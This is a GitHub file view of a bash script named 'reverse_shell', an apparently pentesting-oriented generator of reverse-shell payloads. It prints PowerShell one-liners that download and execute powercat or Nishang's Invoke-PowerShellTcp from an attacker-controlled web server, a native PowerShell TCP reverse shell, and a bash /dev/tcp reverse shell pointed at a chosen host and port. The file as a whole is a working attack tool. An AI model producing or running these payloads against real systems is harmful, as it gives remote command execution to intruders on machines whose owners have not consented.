-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathreverse_shell
More file actions
executable file
·83 lines (70 loc) · 1.82 KB
/
reverse_shell
File metadata and controls
executable file
·83 lines (70 loc) · 1.82 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/bin/bash
set -e
err() {
>&2 echo $@
}
debug() {
{
>&3 echo $@
} 3>&2
}
out() {
echo $@
}
usage() {
echo "$(basename $0) [type] -p LPORT [-l LHOST | -i INTERFACE]"
echo "TYPES:"
printf "\t ps - powershell\n"
printf "\t sh - shell"
exit 1
}
mode=$1; shift
while getopts "hp:r:i:l:w:" o; do
case "${o}" in
p)
LPORT=${OPTARG}
;;
l)
LHOST=${OPTARG}
;;
i)
LHOST=$(ip_addr ${OPTARG})
;;
w)
WWW_PORT=${OPTARG}
;;
h | *)
usage
;;
esac
done
shift $((OPTIND-1))
if [ -z "${LPORT}" ] || [ -z "${LHOST}" ]; then
usage
fi
ps_powercat() {
BASE_URL="http://$LHOST:${WWW_PORT:-80}"
echo -n "IEX (New-Object System.Net.WebClient).DownloadString('${BASE_URL}/windows/powercat.ps1');powercat -c $LHOST -p $LPORT -e powershell.exe"
}
ps_nishang() {
BASE_URL="http://$LHOST:${WWW_PORT:-80}"
echo -n "IEX (New-Object System.Net.WebClient).DownloadString('${BASE_URL}/windows/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $LHOST -Port $LPORT"
}
ps_native() {
echo -n "New-Object System.Net.Sockets.TCPClient(\"$LHOST\",$LPORT);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()"
}
generate_powershell() {
# ps_powercat
ps_nishang
}
generate_bash() {
echo -n "/bin/bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1"
}
case "$mode" in
ps | powershell)
generate_powershell
;;
sh | shell)
generate_bash
;;
esac